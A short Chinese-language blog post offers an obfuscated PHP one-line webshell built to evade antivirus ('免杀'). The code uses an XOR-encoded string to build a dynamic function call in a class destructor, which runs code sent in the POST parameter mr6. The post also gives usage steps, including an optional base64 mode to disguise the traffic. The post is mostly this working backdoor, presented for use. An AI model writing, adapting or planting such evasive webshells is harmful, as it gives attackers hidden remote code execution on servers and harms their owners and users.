v33异或免杀PHP一句话

venom 33的更新，webshell免杀PHP一句话，体积更小了。

<?php
class VMTX{
    function __destruct(){
        $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20";
        return @$BRLI("$this->EKDL");
    }
}
$vmtx=new VMTX();
@$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>

使用说明

是否传入id参数决定是否把流量编码

http://www.xxx.com/shell.php  
POST: mr6=phpinfo();  //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编码

标签：webshell 一句话 PHP一句话

温馨提示：本文最后更新于2019年9月5日 14:04，若内容或图片失效，请在下方留言或联系博主。

本文作者：admins
本文链接：http://caidaome.com/?post=227
版权申明：除非特别说明，否则均为本站原创文章，转载或复制请注明出处。

博主关闭了评论